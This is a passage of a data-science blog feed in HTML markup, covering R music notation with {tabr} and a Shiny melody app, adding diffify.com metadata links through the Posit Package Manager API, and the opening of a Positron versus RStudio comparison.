&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tabrSyntax
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## description syntax example
## 1 note/pitch a b ... g a
## 2 sharp # a#
## 3 flat _ a_
## 4 drop or raise one octave , or ' a, a a'
## 5 octave number 0 1 ... a2 a3 a4
## 6 tied notes ~ a~ a
## 7 note duration 2^n 1 2 4 8 16
## 8 dotted note . 2. 2..
## 9 slide - 2-
## 10 bend ^ 2^
## 11 muted/dead note x 2x
## 12 slur/hammer/pull off () 2( 2)
## 13 rest r r
## 14 silent rest s s
## 15 expansion operator * ceg*8, 1*4
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For guitarists, there’s also the ability to plot out guitar tab (hence
the name; strangely the notes have been transposed by an octave):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_music_guitar&lt;/span&gt;(melody, header&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jingle Bells&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/music-in-r/images/tabrGuitarJingle-1.png"&gt;
&lt;p&gt;It should be noted that {tabr} is not as flexible as LilyPond when it
comes to creating musical scores, and indeed, the author recommends that
“If you are only creating sheet music on a case by case basis, write
your own LilyPond files manually”. The truth is, I got a lot of errors
while experimenting with {tabr}, but it was still a fun experiment.&lt;/p&gt;
&lt;h2 id="blue-lines-adding-scores-to-an-app"&gt;Blue Lines: Adding scores to an app&lt;/h2&gt;
&lt;p&gt;I originally wanted to randomly-generate music phrases that I could
interpret myself. And {tabr} looked like a good fit for just printing
out notes to an app.&lt;/p&gt;
&lt;p&gt;We sample from two octaves of the ‘white notes’ of the C major scale:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# C major notes from G below middle-C&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;notes &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;g&amp;#34;&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;], &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#39;&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#39;&amp;#39;&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To get a valid musical string, we can do the following:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sample_notes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x, n) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(x, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; n, replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;4&amp;#34;&lt;/span&gt;, sep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rand_melody &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample_notes&lt;/span&gt;(notes, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rand_melody
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## [1] &amp;quot;b4&amp;quot; &amp;quot;c''4&amp;quot; &amp;quot;f'4&amp;quot; &amp;quot;g''4&amp;quot; &amp;quot;e'4&amp;quot; &amp;quot;b4&amp;quot; &amp;quot;a'4&amp;quot; &amp;quot;b4&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rand_melody &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_music&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_music&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/music-in-r/images/randomMelody-1.png"&gt;
&lt;p&gt;As a way of sampling melodies this is as simple as it gets. And it works
in an app quite nicely too:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tabr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;music&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; melody &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactive&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;invalidateLater&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10000&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# sample a new melody every 10s&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample_notes&lt;/span&gt;(notes, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;music &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;melody&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_music&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_music&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;There was a couple of issues with the app (and I made it a bit more
complicated before I realised this).&lt;/p&gt;
&lt;p&gt;The main issue was that, if I deployed to
&lt;a href="https://www.shinyapps.io/" rel="external"&gt;&lt;code&gt;shinyapps.io&lt;/code&gt;&lt;/a&gt;, LilyPond wasn’t available -
so to use the app for real, I would have had to take a laptop, rather
than just my phone, to the open-mic with me - and I’m a rather
heavy-handed pianist so something expensive could well have broken….&lt;/p&gt;
&lt;p&gt;The other issue was that rendering the music was a little slow and
updating the score was glitchy - a png is created on the server side and
transferred to the browser every 10 seconds. There are JavaScript
libraries that can render musical scores, for example, the Humdrum
library has a &lt;a href="https://plugin.humdrum.org/" rel="external"&gt;JavaScript plugin&lt;/a&gt;. Using
such a library would mean that our shiny app could transfer some Humdrum
notation to the browser, which might speed up rendering. The website for
the Humdrum plugin includes an
&lt;a href="https://plugin.humdrum.org/topic/shiny/" rel="external"&gt;example&lt;/a&gt; of how to use it in a
Shiny app - however, extending these examples to dynamically update
after a new melody was sampled didn’t work for me. So, my next project
is to work out how to write an
&lt;a href="https://www.htmlwidgets.org/" rel="external"&gt;htmlwidget&lt;/a&gt; package for Humdrum….&lt;/p&gt;
&lt;h2 id="endtroducing-why-didnt-the-app-deploy"&gt;Endtroducing: Why didn’t the app deploy?&lt;/h2&gt;
&lt;p&gt;When you deploy an app to &lt;code&gt;shinyapps.io&lt;/code&gt;, any packages it depends upon
are installed on the &lt;code&gt;shinyapps.io&lt;/code&gt; server. This would typically include
{shiny}, {bslib} and a few other app-related things, but could include
packages for any number of other things: numerics, data processing,
visualisation. Many of these packages will depend on system libraries -
the {quarto} package requires the Quarto command-line tool to be
installed on a machine, for example. These system dependencies are
encoded in the &lt;code&gt;SystemRequirements&lt;/code&gt; section of the R package
&lt;code&gt;DESCRIPTION&lt;/code&gt; file, the same content you see on CRAN when looking at a
single package. For
&lt;a href="https://cran.r-project.org/web/packages/quarto/" rel="external"&gt;{quarto}&lt;/a&gt; , for
example, the &lt;code&gt;SystemRequirements&lt;/code&gt; state “Quarto command line tool
(&lt;a href="https://github.com/quarto-dev/quarto-cli" rel="external"&gt;https://github.com/quarto-dev/quarto-cli&lt;/a&gt;).”.&lt;/p&gt;
&lt;p&gt;Now, the &lt;code&gt;SystemRequirements&lt;/code&gt; is a freely-structured text field. As a
package author you can write whatever you want in there, and it is up to
the users of your package to ensure that their system has the
&lt;code&gt;SystemRequirements&lt;/code&gt; available. This makes sense because on different
operating systems, the system libraries have different names. But it’s a
little problematic when attempting to deploy to a server - if you need
an R package that has a system-requirement that isn’t already available
on that server, and you can’t log in to the server to install system
libraries, how do you ensure it gets installed?&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://pak.r-lib.org/" rel="external"&gt;{pak}&lt;/a&gt; package helps here. This provides an
enhanced way to install R packages. When {pak} installs packages, it
uses the free-text &lt;code&gt;SystemRequirements&lt;/code&gt; field to determine the
OS-specific system libraries that an R package needs. It does this by
making use of rules specified in the
&lt;a href="https://github.com/r-hub/r-system-requirements/tree/pak/rules" rel="external"&gt;r-hub/r-system-requirements&lt;/a&gt;
repository. This is outlined in a &lt;a href="https://blog.r-hub.io/2023/09/26/system-dependency/" rel="external"&gt;blog
post&lt;/a&gt; by Hugo
Gruson.&lt;/p&gt;
&lt;p&gt;Ultimately what happened, is that while {pak} was installing the R
packages for my {tabr}-dependent app to &lt;code&gt;shinyapps.io&lt;/code&gt; it saw that there
was a dependency on LilyPond, but because there is no LilyPond rule at
&lt;code&gt;r-hub/r-system-requirements&lt;/code&gt;, it couldn’t work out what libraries or
system tools it needed to install. So {tabr} installed, but the
‘lilypond’ library that it depends upon didn’t.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/music-in-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Diffify &amp; Posit Package Manager</title><link>https://www.jumpingrivers.com/blog/diffify-posit-package-manager/</link><pubDate>Thu, 12 Dec 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/diffify-posit-package-manager/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/diffify-posit-package-manager/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/diffify-posit-package-manager/header.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://docs.posit.co/rspm/news/package-manager/#posit-package-manager-2024110" rel="external"&gt;latest release&lt;/a&gt; of Posit Package Manager introduces several enhancements, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Python Git Builders:&lt;/strong&gt; Build Python packages (wheels) directly from Git.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Blocklists:&lt;/strong&gt; Easily block specific packages or versions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved Documentation:&lt;/strong&gt; Clearer and more accessible information.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All great stuff, I&amp;rsquo;m sure. But most of them don&amp;rsquo;t directly impact the end user.
But there is an exception to this rule, and that&amp;rsquo;s the ability to add custom metadata to a package page.&lt;/p&gt;
&lt;h1 id="what-is-package-metadata"&gt;What is Package Metadata?&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://docs.posit.co/rspm/admin/metadata/metadata/" rel="external"&gt;Custom metadata&lt;/a&gt; lets administrators define key-value pairs for packages. For instance, you could tag packages as part of the tidyverse with &lt;code&gt;is_tidyverse: TRUE|FALSE&lt;/code&gt;. Other use cases include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Assigning scores to packages.&lt;/li&gt;
&lt;li&gt;Linking additional documentation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Metadata can apply globally (e.g., all versions of &lt;code&gt;{dplyr}&lt;/code&gt;) or to specific versions in a repository.&lt;/p&gt;
&lt;h1 id="how-to-add-metadata"&gt;How to Add Metadata&lt;/h1&gt;
&lt;p&gt;Metadata is added via the API. Start by creating a token:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Care should be taken over expires and scope&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rspm create token --scope&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;global:admin --expires&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;never --description&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Allows global admin access&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Generated an access token. Be sure to record this token immediately since you will not be able to retrieve it later.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will generate an access token (e.g., &lt;code&gt;eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...&lt;/code&gt;).
As with most tokens, it&amp;rsquo;s not retrievable, so put it somewhere secure.&lt;/p&gt;
&lt;p&gt;Test the token on the API page, ensuring you prefix it with Bearer when authorizing.&lt;/p&gt;
&lt;img title = "Screenshot of Autorisation pop-up from Posit Package Manager" src="api-token.png" class="image-center" style="width: 450px;" /&gt;
&lt;p&gt;For example, a &lt;code&gt;/verify-auth&lt;/code&gt; GET request with a valid token should return a 200 response, confirming successful authorization.&lt;/p&gt;
&lt;h2 id="linking-with-diffifycom"&gt;Linking with diffify.com&lt;/h2&gt;
&lt;p&gt;The &lt;a href="https://diffify.com" rel="external"&gt;diffify.com&lt;/a&gt; website has a predictable URL structure: &lt;code&gt;diffify.com/language/package-name/old-version/new-version&lt;/code&gt;, where&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;language:&lt;/strong&gt; either &lt;code&gt;r&lt;/code&gt; or &lt;code&gt;python&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;package-name&lt;/strong&gt;: name of the R or Python package&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;versions:&lt;/strong&gt; Optional, specify one or both.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="diffifycom--posit-package-manager"&gt;diffify.com &amp;amp; Posit Package Manager&lt;/h2&gt;
&lt;p&gt;Adding the diffify links to PPM is performed using the&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;POST &lt;code&gt;/metadata/records/&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;and/or&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;POST &lt;code&gt;/metadata/records/bulk&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;API calls. Depending on how precise you want to be you can either add a global meta tag, e.g.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Diffify: &lt;a href="https://diffify.com/r/datasauRus" rel="external"&gt;https://diffify.com/r/datasauRus&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;which would work for all versions of diffify.
This is less work for the admin, but the user has to perform an extra click.&lt;/p&gt;
&lt;p&gt;Or specify the version number in the URL,&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Diffify: &lt;a href="https://diffify.com/r/datasauRus/0.1.2" rel="external"&gt;https://diffify.com/r/datasauRus/0.1.2&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;which is more work for the admin, but nicer for the user. The end result after this hard work
is a nice link near the top of the page.&lt;/p&gt;
&lt;img title = "Final product with {datasauRus} diffify link" src="datasauRus.png" class="image-center" style="width: 550px;" /&gt;
&lt;p&gt;To learn more about &lt;a href="https://diffify.com/" rel="external"&gt;diffify.com&lt;/a&gt;, check out our blog posts &lt;a href="https://www.jumpingrivers.com/blog/?search=diffify" rel="external"&gt;here&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/diffify-posit-package-manager/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Positron vs RStudio - is it time to switch?</title><link>https://www.jumpingrivers.com/blog/why-move-to-positron-r/</link><pubDate>Thu, 05 Dec 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-move-to-positron-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-move-to-positron-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://positron.posit.co/" rel="external"&gt;Positron&lt;/a&gt; is the new beta Data Science IDE
from &lt;a href="https://posit.co/" rel="external"&gt;Posit.&lt;/a&gt; Though Posit have stressed that
maintenance and development of RStudio will continue, I want to use this
blog to explore if Positron is worth the switch. I’m coming at this from
the R development side but there will of course be some nuances from
other languages in use within Positron that require some thought.&lt;/p&gt;
&lt;p&gt;And I hope to put out another version of this for Python!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-why-move-to-positron-r"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="a-polyglot-ide"&gt;A “polyglot” IDE&lt;/h3&gt;
&lt;p&gt;Whilst RStudio is an IDE aimed at Data Science using R, Posit say that
Positron is an IDE aimed at “Data Science” using any programming
language i.e. a “polyglot” IDE. At the moment, it’s just R and Python
but with the possibility to extend. Its current target audience is those
Data Scientists who think RStudio is too niche yet &lt;a href="https://code.visualstudio.com/" rel="external"&gt;VS
Code&lt;/a&gt; is too general.&lt;/p&gt;
&lt;p&gt;Everything inside the RStudio window, for all its beauty, is run using
one R process. This is why when R crashes, RStudio does too. However,
Positron is built using the same base as VS Code (a fork of Code OSS)
which enables Positron to run R (and Python) through communication with
a kernel. Sparing you the gory details, for us programmers it means we
have the incredible ability to be able to switch between not only
versions of R, but other languages too. All through just two clicks of a
button!&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/kernel-switch.png" alt="GUI for switching kernel from R to Python." width="300px" style="display: block; margin: auto;" /&gt;
&lt;h3 id="settings-and-the-command-palette"&gt;Settings and the command palette&lt;/h3&gt;
&lt;p&gt;Like RStudio, there is a command palette to manage settings and initiate
operations. Though I confess, I didn’t actually know this about RStudio
until I wrote this blog. That’s also the key difference. In Positron,
the command palette is the primary way to manage settings, and there’s a
very clear prompt at the top of the screen. In RStudio it feels more
like a hidden feature.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/command-palette.png" alt="Positron command palette." style="display: block; margin: auto;" /&gt;
&lt;p&gt;Also, by default Positron does not save your .RData to your workspace,
nor does it ask you! You can change this if you want.&lt;/p&gt;
&lt;h3 id="workspaces--r-projects"&gt;Workspaces / R projects&lt;/h3&gt;
&lt;p&gt;R projects are no longer the main way of grouping files. Instead,
Positron uses workspaces. A workspace is analogous to any folder on your
device. By default the working directory is set to whichever folder you
have open. I’ve found this useful, as it means I don’t need to create an
&lt;code&gt;.Rproj&lt;/code&gt; file to reap (&lt;em&gt;most of the&lt;/em&gt;) the benefits of project-based
development. As you can see below, there are a LOT of hints that opening
a folder is the best way to work in Positron.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/new-project-big.png" alt="Starting a new project in Positron." style="display: block; margin: auto;" /&gt;
&lt;p&gt;If you still need an R project file, then Positron provides the ability
to create these too (but it doesn’t really mean anything in Positron).&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/new-r-project.png" alt="GUI for selecting Python, R or Jupyter Notebook project." style="display: block; margin: auto;" /&gt;
&lt;h3 id="layout"&gt;Layout&lt;/h3&gt;
&lt;p&gt;The biggest difference in layout is the addition of the sidebar to the
left. This houses the (more advanced) file explorer, source control,
search and replace, debug and extensions. We’ll talk about each one of
these in turn throughout the blog.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/sidebar-layout.png" alt="Positron file viewer." class="image-center" style="width: 330px"/&gt;
&lt;p&gt;The file explorer is a big plus for me. Firstly, it is just easier to
work with and takes up less real estate. But it also directly integrates
with the source control and the R interpreter. This means you have live
feedback for the git status of your files and if your interpreter has
detected any problems. Whilst this is nice, it does mean Positron will
nearly always indicate there’s problems with your code before any code
has been run.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/sidebar-using-code.png" alt="Whole view of Positron whilst file viewer is open." style="display: block; margin: auto;" /&gt;
&lt;p&gt;For the configuration of the panes etc, check out the layout options in
the command palette. I’m using the “Side-by-Side Layout” and have
dragged the “variables” and “plots” panes adjacent with the console.&lt;/p&gt;
&lt;h3 id="extensions"&gt;Extensions&lt;/h3&gt;
&lt;p&gt;As Positron is made from the same stuff as VS Code, we now get VS Code
extensions, but only from the &lt;a href="https://open-vsx.org/" rel="external"&gt;OpenVSX&lt;/a&gt;
marketplace. Still, there’s nearly everything you could ever want in
there. Including themes, rainbow CSV, and Git integrations.&lt;/p&gt;
&lt;h3 id="using-git"&gt;Using Git&lt;/h3&gt;
&lt;p&gt;I think this one will divide people. I very much enjoy the RStudio Git
GUI - the simplicity of it is probably it’s best feature and definitely
what I will miss the most. However, it was limited. Positron’s “source
control” section gives you far more control over what you can do using
Git without having to head to the terminal.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/source_control.png" alt="Git window in Positron." style="display: block; margin: auto;" /&gt;
&lt;p&gt;As well as Positron’s built-in Git support, there are extensions too.
There’s a GitLab workflow extension for viewing merge requests, issues
and more and about a million extensions for GitHub. I’m particularly
enjoying the Git Graph extension, which allows me to view the branch
graph in a separate tab. Please enjoy this ridiculous example of a git
branch graph.&lt;/p&gt;
